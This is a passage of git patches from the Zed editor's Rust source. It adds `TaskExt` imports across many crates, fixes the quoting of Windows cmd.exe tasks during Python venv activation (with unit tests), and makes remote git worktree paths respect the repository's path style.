db::kvp::KeyValueStore; use futures::{channel::oneshot, future::join_all}; use gpui::{ Action, Anchor, AnyView, App, AsyncApp, AsyncWindowContext, Context, Entity, EventEmitter, - FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, Task, WeakEntity, - Window, actions, + FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, Task, TaskExt, + WeakEntity, Window, actions, }; use itertools::Itertools; use project::{Fs, Project}; diff --git a/crates/terminal_view/src/terminal_path_like_target.rs b/crates/terminal_view/src/terminal_path_like_target.rs index f0f13d8fc2cd73..fb3abf41db74ca 100644 --- a/crates/terminal_view/src/terminal_path_like_target.rs +++ b/crates/terminal_view/src/terminal_path_like_target.rs @@ -1,7 +1,7 @@ use super::{HoverTarget, HoveredWord, TerminalView}; use anyhow::{Context as _, Result}; use editor::Editor; -use gpui::{App, AppContext, Context, Task, WeakEntity, Window}; +use gpui::{App, AppContext, Context, Task, TaskExt, WeakEntity, Window}; use itertools::Itertools; use project::{Entry, Metadata}; use std::path::PathBuf; diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index a6e28a95f50de4..07c638c16048c3 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -11,8 +11,8 @@ use editor::{ use gpui::{ Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, Font, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent, - Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions, - anchored, deferred, div, + Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, TaskExt, WeakEntity, + actions, anchored, deferred, div, }; use itertools::Itertools; use menu; diff --git a/crates/title_bar/src/collab.rs b/crates/title_bar/src/collab.rs index 474d0d287e47dc..72569b84fd40b4 100644 --- a/crates/title_bar/src/collab.rs +++ b/crates/title_bar/src/collab.rs @@ -5,8 +5,8 @@ use call::{ActiveCall, Room}; use channel::ChannelStore; use client::{User, proto::PeerId}; use gpui::{ - AnyElement, Hsla, IntoElement, MouseButton, Path, ScreenCaptureSource, Styled, WeakEntity, - canvas, point, + AnyElement, Hsla, IntoElement, MouseButton, Path, ScreenCaptureSource, Styled, TaskExt, + WeakEntity, canvas, point, }; use gpui::{App, Task, Window}; use icons::IconName; diff --git a/crates/title_bar/src/onboarding_banner.rs b/crates/title_bar/src/onboarding_banner.rs index 96400a91a0a26f..24dccdc35b9f23 100644 --- a/crates/title_bar/src/onboarding_banner.rs +++ b/crates/title_bar/src/onboarding_banner.rs @@ -2,7 +2,7 @@ // It's currently not in use but is kept for future feature announcements. #![allow(dead_code)] -use gpui::{Action, Entity, Global, Render, SharedString}; +use gpui::{Action, Entity, Global, Render, SharedString, TaskExt}; use ui::{ButtonLike, Tooltip, prelude::*}; use util::ResultExt; diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index c6f82adcdf01d1..8e194218990975 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -29,7 +29,7 @@ use cloud_api_types::Plan; use gpui::{ Action, Anchor, Animation, AnimationExt, AnyElement, App, Context, Element, Entity, Focusable, InteractiveElement, IntoElement, MouseButton, ParentElement, Render, - StatefulInteractiveElement, Styled, Subscription, WeakEntity, Window, actions, div, + StatefulInteractiveElement, Styled, Subscription, TaskExt, WeakEntity, Window, actions, div, pulsating_between, }; use onboarding_banner::OnboardingBanner; diff --git a/crates/ui/src/components/context_menu.rs b/crates/ui/src/components/context_menu.rs index c8f330526df4d1..ef21abaf3ecc04 100644 --- a/crates/ui/src/components/context_menu.rs +++ b/crates/ui/src/components/context_menu.rs @@ -5,7 +5,7 @@ use crate::{ use gpui::{ Action, Anchor, AnyElement, App, Bounds, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Point, Size, - Subscription, anchored, canvas, prelude::*, px, + Subscription, TaskExt, anchored, canvas, prelude::*, px, }; use menu::{SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious}; use std::{ diff --git a/crates/vim/src/command.rs b/crates/vim/src/command.rs index 6c10c3212334c6..da7092db6996c6 100644 --- a/crates/vim/src/command.rs +++ b/crates/vim/src/command.rs @@ -8,7 +8,8 @@ use editor::{ }; use futures::AsyncWriteExt as _; use gpui::{ - Action, App, AppContext as _, Context, Global, Keystroke, Task, WeakEntity, Window, actions, + Action, App, AppContext as _, Context, Global, Keystroke, Task, TaskExt, WeakEntity, Window, + actions, }; use itertools::Itertools; use language::Point; diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index 544a19167ac905..796d69b28222b0 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -11,7 +11,7 @@ use editor::{ NavigationTargetOverlay, SelectionEffects, ToOffset, ToPoint, movement, }; use gpui::actions; -use gpui::{App, Context, Font, Hsla, Pixels, Window, WindowTextSystem}; +use gpui::{App, Context, Font, Hsla, Pixels, TaskExt, Window, WindowTextSystem}; use language::{CharClassifier, CharKind, Point, Selection}; use multi_buffer::MultiBufferSnapshot; use search::{BufferSearchBar, SearchOptions}; diff --git a/crates/vim/src/normal.rs b/crates/vim/src/normal.rs index 1d0d0812e82899..e2ce1fb1284329 100644 --- a/crates/vim/src/normal.rs +++ b/crates/vim/src/normal.rs @@ -28,7 +28,7 @@ use editor::Editor; use editor::{Anchor, SelectionEffects}; use editor::{Bias, ToPoint}; use editor::{display_map::ToDisplayPoint, movement}; -use gpui::{Context, Window, actions}; +use gpui::{Context, TaskExt, Window, actions}; use language::{AutoIndentMode, Point, SelectionGoal}; use log::error; use multi_buffer::MultiBufferRow; diff --git a/crates/vim/src/normal/mark.rs b/crates/vim/src/normal/mark.rs index 48cf8739b725f6..7f205a0fb8fda0 100644 --- a/crates/vim/src/normal/mark.rs +++ b/crates/vim/src/normal/mark.rs @@ -5,7 +5,7 @@ use editor::{ display_map::{DisplaySnapshot, ToDisplayPoint}, movement, }; -use gpui::{Context, Entity, EntityId, UpdateGlobal, Window}; +use gpui::{Context, Entity, EntityId, TaskExt, UpdateGlobal, Window}; use language::SelectionGoal; use text::Point; use ui::App; diff --git a/crates/vim/src/normal/search.rs b/crates/vim/src/normal/search.rs index e7d17af1e3eb1d..4fde2f786ce5ab 100644 --- a/crates/vim/src/normal/search.rs +++ b/crates/vim/src/normal/search.rs @@ -1,5 +1,5 @@ use editor::{Editor, EditorSettings}; -use gpui::{Action, Context, Window, actions}; +use gpui::{Action, Context, TaskExt, Window, actions}; use language::Point; use schemars::JsonSchema; use search::{BufferSearchBar, SearchOptions, buffer_search}; diff --git a/crates/vim/src/state.rs b/crates/vim/src/state.rs index 3ca4d704c7ced6..0851604e1abcdf 100644 --- a/crates/vim/src/state.rs +++ b/crates/vim/src/state.rs @@ -15,7 +15,8 @@ use editor::display_map::{is_invisible, replacement}; use editor::{Anchor, ClipboardSelection, Editor, MultiBuffer, ToPoint as EditorToPoint}; use gpui::{ Action, App, AppContext, BorrowAppContext, ClipboardEntry, ClipboardItem, DismissEvent, Entity, - EntityId, Global, HighlightStyle, StyledText, Subscription, Task, TextStyle, WeakEntity, + EntityId, Global, HighlightStyle, StyledText, Subscription, Task, TaskExt, TextStyle, + WeakEntity, }; use language::{Buffer, BufferEvent, BufferId, Chunk, LanguageAwareStyling, Point}; diff --git a/crates/workspace/src/item.rs b/crates/workspace/src/item.rs index 5cd669473c73fd..573a6d9ac0afbc 100644 --- a/crates/workspace/src/item.rs +++ b/crates/workspace/src/item.rs @@ -12,7 +12,7 @@ use client::{Client, proto}; use futures::channel::mpsc; use gpui::{ Action, AnyElement, AnyEntity, AnyView, App, AppContext, Context, Entity, EntityId, - EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task, + EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task, TaskExt, WeakEntity, Window, }; use language::Capability; diff --git a/crates/workspace/src/multi_workspace.rs b/crates/workspace/src/multi_workspace.rs index 7916646311d328..999b4d30413a5c 100644 --- a/crates/workspace/src/multi_workspace.rs +++ b/crates/workspace/src/multi_workspace.rs @@ -3,8 +3,8 @@ use fs::Fs; use gpui::{ AnyView, App, Context, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, - ManagedView, MouseButton, Pixels, Render, Subscription, Task, Tiling, WeakEntity, Window, - WindowId, actions, deferred, px, + ManagedView, MouseButton, Pixels, Render, Subscription, Task, TaskExt, Tiling, WeakEntity, + Window, WindowId, actions, deferred, px, }; pub use project::ProjectGroupKey; use project::{DisableAiSettings, Project}; diff --git a/crates/workspace/src/pane.rs b/crates/workspace/src/pane.rs index aa6e53ef666348..4a2204d4c5f5a2 100644 --- a/crates/workspace/src/pane.rs +++ b/crates/workspace/src/pane.rs @@ -21,8 +21,8 @@ use gpui::{ Action, Anchor, AnyElement, App, AsyncWindowContext, ClickEvent, ClipboardItem, Context, Div, DragMoveEvent, Entity, EntityId, EventEmitter, ExternalPaths, FocusHandle, FocusOutEvent, Focusable, KeyContext, MouseButton, NavigationDirection, Pixels, Point, PromptLevel, Render, - ScrollHandle, Subscription, Task, WeakEntity, WeakFocusHandle, Window, actions, anchored, - deferred, prelude::*, + ScrollHandle, Subscription, Task, TaskExt, WeakEntity, WeakFocusHandle, Window, actions, + anchored, deferred, prelude::*, }; use itertools::Itertools; use language::{Capability, DiagnosticSeverity}; diff --git a/crates/workspace/src/persistence.rs b/crates/workspace/src/persistence.rs index b1328aa3614905..66af132b47c307 100644 --- a/crates/workspace/src/persistence.rs +++ b/crates/workspace/src/persistence.rs @@ -2759,6 +2759,7 @@ mod tests { read_multi_workspace_state, }, }; + use gpui::TaskExt; use gpui::AppContext as _; use pretty_assertions::assert_eq; diff --git a/crates/workspace/src/tasks.rs b/crates/workspace/src/tasks.rs index 3ea35678865553..2d68d7d2ab0af8 100644 --- a/crates/workspace/src/tasks.rs +++ b/crates/workspace/src/tasks.rs @@ -2,7 +2,7 @@ use std::process::ExitStatus; use anyhow::Result; use collections::HashSet; -use gpui::{AppContext, AsyncWindowContext, Context, Entity, Task, WeakEntity}; +use gpui::{AppContext, AsyncWindowContext, Context, Entity, Task, TaskExt, WeakEntity}; use language::Buffer; use project::{TaskSourceKind, WorktreeId}; use remote::ConnectionState; diff --git a/crates/workspace/src/welcome.rs b/crates/workspace/src/welcome.rs index 4110cffc46d811..122cc468a4547f 100644 --- a/crates/workspace/src/welcome.rs +++ b/crates/workspace/src/welcome.rs @@ -8,7 +8,7 @@ use agent_settings::AgentSettings; use git::Clone as GitClone; use gpui::{ Action, App, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, - ParentElement, Render, Styled, Task, Window, actions, + ParentElement, Render, Styled, Task, TaskExt, Window, actions, }; use gpui::{WeakEntity, linear_color_stop, linear_gradient}; use menu::{SelectNext, SelectPrevious}; diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index 03b01cc79d81ad..bc675729f14cc6 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -63,8 +63,8 @@ use gpui::{ Context, CursorStyle, Decorations, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Global, HitboxBehavior, Hsla, KeyContext, Keystroke, ManagedView, MouseButton, PathPromptOptions, Point, PromptLevel, Render, ResizeEdge, Size, Stateful, Subscription, - SystemWindowTabController, Task, Tiling, WeakEntity, WindowBounds, WindowHandle, WindowId, - WindowOptions, actions, canvas, point, relative, size, transparent_black, + SystemWindowTabController, Task, TaskExt, Tiling, WeakEntity, WindowBounds, WindowHandle, + WindowId, WindowOptions, actions, canvas, point, relative, size, transparent_black, }; pub use history_manager::*; pub use item::{ diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 8f417ee08abcbf..de49d220cd4b55 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -22,8 +22,8 @@ use futures::{StreamExt, channel::oneshot, future}; use git::GitHostingProviderRegistry; use git_ui::clone::clone_and_open; use gpui::{ - App, AppContext, Application, AsyncApp, Focusable as _, QuitMode, Task, UpdateGlobal as _, - block_on, + App, AppContext, Application, AsyncApp, Focusable as _, QuitMode, Task, TaskExt, + UpdateGlobal as _, block_on, }; use gpui_platform; diff --git a/crates/zed/src/reliability.rs b/crates/zed/src/reliability.rs index b74cdebbacd5e5..fd602d4ab50d3e 100644 --- a/crates/zed/src/reliability.rs +++ b/crates/zed/src/reliability.rs @@ -2,7 +2,7 @@ use anyhow::{Context as _, Result}; use client::{Client, telemetry::MINIDUMP_ENDPOINT}; use feature_flags::FeatureFlagAppExt; use futures::{AsyncReadExt, TryStreamExt}; -use gpui::{App, AppContext as _, SerializedThreadTaskTimings}; +use gpui::{App, AppContext as _, SerializedThreadTaskTimings, TaskExt}; use http_client::{self, AsyncBody, HttpClient, Request}; use log::info; use project::Project; diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 3afd117a015de7..180d85440df347 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -36,7 +36,7 @@ use git_ui::project_diff::{BranchDiffToolbar, ProjectDiffToolbar}; use gpui::{ Action, App, AppContext as _, AsyncWindowContext, ClipboardItem, Context, DismissEvent, Element, Entity, FocusHandle, Focusable, Image, ImageFormat, KeyBinding, ParentElement, - PathPromptOptions, PromptLevel, ReadGlobal, SharedString, Size, Task, TitlebarOptions, + PathPromptOptions, PromptLevel, ReadGlobal, SharedString, Size, Task, TaskExt, TitlebarOptions, UpdateGlobal, WeakEntity, Window, WindowBounds, WindowHandle, WindowKind, WindowOptions, actions, image_cache, img, point, px, retain_all, }; diff --git a/crates/zed/src/zed/open_listener.rs b/crates/zed/src/zed/open_listener.rs index 6faf0d3fe6835d..18ea7c086978cb 100644 --- a/crates/zed/src/zed/open_listener.rs +++ b/crates/zed/src/zed/open_listener.rs @@ -14,7 +14,7 @@ use futures::future; use futures::{FutureExt, StreamExt}; use git_ui::{file_diff_view::FileDiffView, multi_diff_view::MultiDiffView}; -use gpui::{App, AsyncApp, Global, WindowHandle}; +use gpui::{App, AsyncApp, Global, TaskExt, WindowHandle}; use onboarding::FIRST_OPEN; use onboarding::show_onboarding_view; use recent_projects::{RemoteSettings, navigate_to_positions, open_remote_project}; diff --git a/crates/zed/src/zed/quick_action_bar/repl_menu.rs b/crates/zed/src/zed/quick_action_bar/repl_menu.rs index 7502481b5b50b6..7b694281b99561 100644 --- a/crates/zed/src/zed/quick_action_bar/repl_menu.rs +++ b/crates/zed/src/zed/quick_action_bar/repl_menu.rs @@ -1,4 +1,5 @@ use gpui::ElementId; +use gpui::TaskExt; use gpui::{AnyElement, Entity}; use picker::Picker; use repl::{ diff --git a/crates/zed/src/zed/remote_debug.rs b/crates/zed/src/zed/remote_debug.rs index df91953c64c400..e658248cdf8269 100644 --- a/crates/zed/src/zed/remote_debug.rs +++ b/crates/zed/src/zed/remote_debug.rs @@ -1,52 +1,53 @@ -use workspace::Workspace; -use zed_actions::remote_debug::{SimulateDisconnect, SimulateTimeout, SimulateTimeoutExhausted}; - -pub fn init(cx: &mut gpui::App) { - cx.observe_new(|workspace: &mut Workspace, _, cx| { - let project = workspace.project().read(cx); - let Some(remote_client) = project.remote_client() else { - return; - }; - - workspace.register_action({ - let remote_client = remote_client.downgrade(); - move |_, _: &SimulateDisconnect, _window, cx| { - let Some(remote_client) = remote_client.upgrade() else { - return; - }; - - log::info!("SimulateDisconnect: forcing disconnect from remote server"); - remote_client.update(cx, |client, cx| { - client.force_disconnect(cx).detach_and_log_err(cx); - }); - } - }); - - workspace.register_action({ - let remote_client = remote_client.downgrade(); - move |_, _: &SimulateTimeout, _window, cx| { - let Some(remote_client) = remote_client.upgrade() else { - return; - }; - - log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); - remote_client.update(cx, |client, cx| { - client.force_heartbeat_timeout(0, cx); - }); - } - }); - - let remote_client = remote_client.downgrade(); - workspace.register_action(move |_, _: &SimulateTimeoutExhausted, _window, cx| { - let Some(remote_client) = remote_client.upgrade() else { - return; - }; - - log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); - remote_client.update(cx, |client, cx| { - client.force_heartbeat_timeout(remote::remote_client::MAX_RECONNECT_ATTEMPTS, cx); - }); - }); - }) - .detach(); -} +use gpui::TaskExt; +use workspace::Workspace; +use zed_actions::remote_debug::{SimulateDisconnect, SimulateTimeout, SimulateTimeoutExhausted}; + +pub fn init(cx: &mut gpui::App) { + cx.observe_new(|workspace: &mut Workspace, _, cx| { + let project = workspace.project().read(cx); + let Some(remote_client) = project.remote_client() else { + return; + }; + + workspace.register_action({ + let remote_client = remote_client.downgrade(); + move |_, _: &SimulateDisconnect, _window, cx| { + let Some(remote_client) = remote_client.upgrade() else { + return; + }; + + log::info!("SimulateDisconnect: forcing disconnect from remote server"); + remote_client.update(cx, |client, cx| { + client.force_disconnect(cx).detach_and_log_err(cx); + }); + } + }); + + workspace.register_action({ + let remote_client = remote_client.downgrade(); + move |_, _: &SimulateTimeout, _window, cx| { + let Some(remote_client) = remote_client.upgrade() else { + return; + }; + + log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); + remote_client.update(cx, |client, cx| { + client.force_heartbeat_timeout(0, cx); + }); + } + }); + + let remote_client = remote_client.downgrade(); + workspace.register_action(move |_, _: &SimulateTimeoutExhausted, _window, cx| { + let Some(remote_client) = remote_client.upgrade() else { + return; + }; + + log::info!("SimulateTimeout: forcing heartbeat timeout on remote connection"); + remote_client.update(cx, |client, cx| { + client.force_heartbeat_timeout(remote::remote_client::MAX_RECONNECT_ATTEMPTS, cx); + }); + }); + }) + .detach(); +} From ba731fbb981f73012f10ca7bdb4a9fbd9ea02bc6 Mon Sep 17 00:00:00 2001 From: sunwukk990 <82385875+grgwuk990@users.noreply.github.com> Date: Tue, 5 May 2026 19:20:14 -0400 Subject: [PATCH 215/231] project: Fix cmd task quoting with venv activation (#55531) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55022 ## Summary When a task explicitly uses `cmd.exe`, Zed prepares it as a shell invocation like `cmd.exe /S /C ""`. If Python virtual environment activation is enabled, `Project::create_terminal_task` wraps that prepared task in an outer activation shell so the venv can be activated before the task runs. Before this change, the activation formatter treated the prepared `/C` command string as a normal shell argument and quoted it again. On Windows, that can make cmd receive escaped quotes literally, producing errors like `'\\"echo Hi there\\"' is not recognized...`. This preserves the prepared cmd `/C` command string while building the activation command, and keeps the existing quoting path for ordinary task arguments. ## Verification - `cargo test -p project formats_prepared_cmd_task` - `cargo test -p project formats_non_cmd_task_for_activation` - `cargo check -p project` - `cargo fmt --check --package project` - Manually verified on Windows with a selected Python `.venv` that a `cmd.exe` task prints `Hi there` and finishes successfully. Release Notes: - Fixed Windows `cmd.exe` tasks failing when run with a selected Python virtual environment. --- crates/project/src/terminals.rs | 179 +++++++++++++++++++++++++++++--- 1 file changed, 163 insertions(+), 16 deletions(-) diff --git a/crates/project/src/terminals.rs b/crates/project/src/terminals.rs index aa0f94ef7078f3..b0fc16f3c83168 100644 --- a/crates/project/src/terminals.rs +++ b/crates/project/src/terminals.rs @@ -9,6 +9,7 @@ use language::LanguageName; use remote::RemoteClient; use settings::{Settings, SettingsLocation}; use std::{ + borrow::Cow, path::{Path, PathBuf}, sync::Arc, }; @@ -156,23 +157,18 @@ impl Project { let builder = project .update(cx, move |_, cx| { - let format_to_run = || { - if let Some(command) = &spawn_task.command { - let command = shell_kind.prepend_command_prefix(command); - let command = shell_kind.try_quote_prefix_aware(&command); - let args = spawn_task - .args - .iter() - .filter_map(|arg| shell_kind.try_quote(&arg)); - - command.into_iter().chain(args).join(" ") - } else { - // todo: this breaks for remotes to windows - format!("exec {shell} -l") - } + let format_to_run = |spawn_task: &SpawnInTerminal| { + format_task_for_activation( + spawn_task, + shell_kind, + &shell, + path_style.is_windows(), + ) }; let (shell, env) = { + let to_run = + (!activation_script.is_empty()).then(|| format_to_run(&spawn_task)); env.extend(spawn_task.env); match remote_client { Some(remote_client) => match activation_script.clone() { @@ -180,7 +176,7 @@ impl Project { let separator = shell_kind.sequential_commands_separator(); let activation_script = activation_script.join(&format!("{separator} ")); - let to_run = format_to_run(); + let to_run = to_run.expect("activation command was formatted"); let arg = format!("{activation_script}{separator} {to_run}"); let args = shell_kind.args_for_shell(true, arg); @@ -213,7 +209,7 @@ impl Project { let separator = shell_kind.sequential_commands_separator(); let activation_script = activation_script.join(&format!("{separator} ")); - let to_run = format_to_run(); + let to_run = to_run.expect("activation command was formatted"); let arg = format!("{activation_script}{separator} {to_run}"); let args = shell_kind.args_for_shell(true, arg); @@ -644,3 +640,154 @@ fn create_remote_shell( command.env, )) } + +fn format_task_for_activation( + spawn_task: &SpawnInTerminal, + shell_kind: ShellKind, + shell: &str, + is_windows: bool, +) -> String { + if let Some(command) = &spawn_task.command { + let command = shell_kind.prepend_command_prefix(command); + let command = shell_kind.try_quote_prefix_aware(&command); + let args = spawn_task + .args + .iter() + .enumerate() + .filter_map(|(index, arg)| { + quote_prepared_task_arg_for_activation( + spawn_task, shell_kind, arg, index, is_windows, + ) + }); + + command.into_iter().chain(args).join(" ") + } else { + // todo: this breaks for remotes to windows + format!("exec {shell} -l") + } +} + +fn quote_prepared_task_arg_for_activation<'a>( + spawn_task: &SpawnInTerminal, + shell_kind: ShellKind, + arg: &'a str, + index: usize, + is_windows: bool, +) -> Option> { + if spawn_task.shell.shell_kind(is_windows) == ShellKind::Cmd + && index >= 2 + && spawn_task + .args + .get(index - 2) + .is_some_and(|arg| arg.eq_ignore_ascii_case("/S")) + && spawn_task + .args + .get(index - 1) + .is_some_and(|arg| arg.eq_ignore_ascii_case("/C")) + { + // The /C argument is already a cmd command string from prepare_task_for_spawn. + // Quoting it again for venv activation makes cmd see the quotes as literals. + return quote_cmd_command_arg_for_outer_shell(arg, shell_kind).map(Cow::Owned); + } + + shell_kind.try_quote(arg) +} + +fn quote_cmd_command_arg_for_outer_shell(arg: &str, shell_kind: ShellKind) -> Option { + match shell_kind { + ShellKind::PowerShell | ShellKind::Pwsh => Some(format!("'{}'", arg.replace('\'', "''"))), + ShellKind::Cmd => Some(arg.to_string()), + ShellKind::Posix + | ShellKind::Csh + | ShellKind::Tcsh + | ShellKind::Fish + | ShellKind::Nushell + | ShellKind::Rc + | ShellKind::Xonsh + | ShellKind::Elvish => shell_kind.try_quote(arg).map(Cow::into_owned), + } +} + +#[cfg(test)] +mod tests { + use super::*; + use pretty_assertions::assert_eq; + + fn prepared_cmd_task(command_arg: &str) -> SpawnInTerminal { + SpawnInTerminal { + command: Some("cmd.exe".to_string()), + args: vec!["/S".to_string(), "/C".to_string(), command_arg.to_string()], + shell: Shell::Program("cmd.exe".to_string()), + ..SpawnInTerminal::default() + } + } + + #[test] + fn formats_prepared_cmd_task_for_powershell_activation() { + let task = prepared_cmd_task("\"echo Hi there\""); + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cmd.exe /S /C '\"echo Hi there\"'" + ); + } + + #[test] + fn formats_prepared_cmd_task_for_cmd_activation() { + let task = prepared_cmd_task("\"echo Hi there\""); + + assert_eq!( + format_task_for_activation(&task, ShellKind::Cmd, "cmd.exe", true), + "cmd.exe /S /C \"echo Hi there\"" + ); + } + + #[test] + fn formats_prepared_cmd_task_with_shell_args_for_activation() { + let task = SpawnInTerminal { + command: Some("cmd.exe".to_string()), + args: vec![ + "/D".to_string(), + "/S".to_string(), + "/C".to_string(), + "\"echo Hi there\"".to_string(), + ], + shell: Shell::WithArguments { + program: "cmd.exe".to_string(), + args: vec!["/D".to_string()], + title_override: None, + }, + ..SpawnInTerminal::default() + }; + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cmd.exe /D /S /C '\"echo Hi there\"'" + ); + } + + #[test] + fn formats_prepared_cmd_task_with_single_quote_for_powershell_activation() { + let task = prepared_cmd_task("\"echo It's fine\""); + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cmd.exe /S /C '\"echo It''s fine\"'" + ); + } + + #[test] + fn formats_non_cmd_task_for_activation() { + let task = SpawnInTerminal { + command: Some("cargo".to_string()), + args: vec!["test".to_string(), "some test".to_string()], + shell: Shell::System, + ..SpawnInTerminal::default() + }; + + assert_eq!( + format_task_for_activation(&task, ShellKind::PowerShell, "powershell.exe", true), + "&cargo test 'some test'" + ); + } +} From e23217c77dad77bc65293454978e0fe7d4b22d62 Mon Sep 17 00:00:00 2001 From: hayatosc <145091553+hayatosc@users.noreply.github.com> Date: Wed, 6 May 2026 09:06:51 +0900 Subject: [PATCH 216/231] Fix remote worktree path separators (#55486) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54641 Release Notes: - Fixed creating git worktrees in WSL remote projects from Windows. ## Summary - Preserve the repository `PathStyle` when constructing git worktree paths. - Avoid using local OS path separators when creating worktrees for remote Posix projects such as WSL. - Keep worktree archive path checks aligned with the same path-style-aware worktree directory calculation. ## Root Cause Remote repository paths are stored as `PathBuf`s, but `PathBuf::join` and related path operations use the client OS separator. On Windows clients connected to WSL, this could turn a remote Linux path into a mixed path like `/home//\home\\dev\worktrees\...`, causing worktree creation and opening to fail. ## Validation - `cargo fmt --all --check` - `git diff --check` - `cargo test -p project test_new_worktree_path_uses_posix_style_for_remote_paths` - `cargo test -p project test_worktree_directory_uses_remote_path_style` - `cargo test -p project test_join_path_for_style_uses_remote_separator` --------- Co-authored-by: Max Brunsfeld --- .../agent_ui/src/thread_worktree_archive.rs | 12 ++- crates/project/src/git_store.rs | 55 +++++++++--- crates/project/tests/integration/git_store.rs | 42 ++++++--- crates/util/src/paths.rs | 90 +++++++++++++++++++ 4 files changed, 172 insertions(+), 27 deletions(-) diff --git a/crates/agent_ui/src/thread_worktree_archive.rs b/crates/agent_ui/src/thread_worktree_archive.rs index 73b0a426b3097b..b510da96b4e65c 100644 --- a/crates/agent_ui/src/thread_worktree_archive.rs +++ b/crates/agent_ui/src/thread_worktree_archive.rs @@ -12,7 +12,7 @@ use project::{ }; use remote::{RemoteConnectionOptions, same_remote_connection_identity}; use settings::Settings; -use util::ResultExt; +use util::{ResultExt, paths::PathStyle}; use workspace::{AppState, MultiWorkspace, Workspace}; use crate::thread_metadata_store::{ArchivedGitWorktree, ThreadId, ThreadMetadataStore}; @@ -77,9 +77,13 @@ fn archived_worktree_ref_name(id: i64) -> String { /// This intentionally reads the *global* `git.worktree_directory` setting /// rather than any project-local override, because Zed always uses the /// global value when creating worktrees and the archive check must match. -fn worktrees_base_for_repo(main_repo_path: &Path, cx: &App) -> Option { +fn worktrees_base_for_repo( + main_repo_path: &Path, + path_style: PathStyle, + cx: &App, +) -> Option { let setting = &ProjectSettings::get_global(cx).git.worktree_directory; - worktrees_directory_for_repo(main_repo_path, setting).log_err() + worktrees_directory_for_repo(main_repo_path, setting, path_style).log_err() } /// Builds a [`RootPlan`] for archiving the git worktree at `path`. @@ -165,7 +169,7 @@ pub fn build_root_plan( // Only archive worktrees that live inside the Zed-managed worktrees // directory (configured via `git.worktree_directory`). Worktrees the // user created outside that directory should be left untouched. - let worktrees_base = worktrees_base_for_repo(&main_repo_path, cx)?; + let worktrees_base = worktrees_base_for_repo(&main_repo_path, linked_snapshot.path_style, cx)?; if !path.starts_with(&worktrees_base) { return None; } diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 8f49e4c91832c0..b39f24bb4ced02 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -6824,10 +6824,15 @@ impl Repository { .unwrap_or(self.common_dir_abs_path.as_ref()); let project_name = repository_anchor .file_name() + .and_then(|name| name.to_str()) .ok_or_else(|| anyhow!("git repo must have a directory name"))?; - let directory = - worktrees_directory_for_repo(repository_anchor, worktree_directory_setting)?; - Ok(directory.join(branch_name).join(project_name)) + let directory = worktrees_directory_for_repo( + repository_anchor, + worktree_directory_setting, + self.path_style, + )?; + let directory = self.path_style.join_path(&directory, branch_name)?; + self.path_style.join_path(&directory, project_name) } pub fn worktrees(&mut self) -> oneshot::Receiver>> { @@ -7123,7 +7128,12 @@ impl Repository { let managed_worktree_base = cx.update(|cx| { let setting = &ProjectSettings::get_global(cx).git.worktree_directory; - worktrees_directory_for_repo(&repository_anchor_path, setting).log_err() + worktrees_directory_for_repo( + &repository_anchor_path, + setting, + PathStyle::local(), + ) + .log_err() }); if let Some(managed_worktree_base) = managed_worktree_base { @@ -8145,14 +8155,14 @@ pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Opti pub fn worktrees_directory_for_repo( repository_anchor_path: &Path, worktree_directory_setting: &str, + path_style: PathStyle, ) -> Result { // Check the original setting before trimming, since a path like "///" // is absolute but becomes "" after stripping trailing separators. // Also check for leading `/` or `\` explicitly, because on Windows // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees` // would slip through even though it's clearly not a relative path. - if 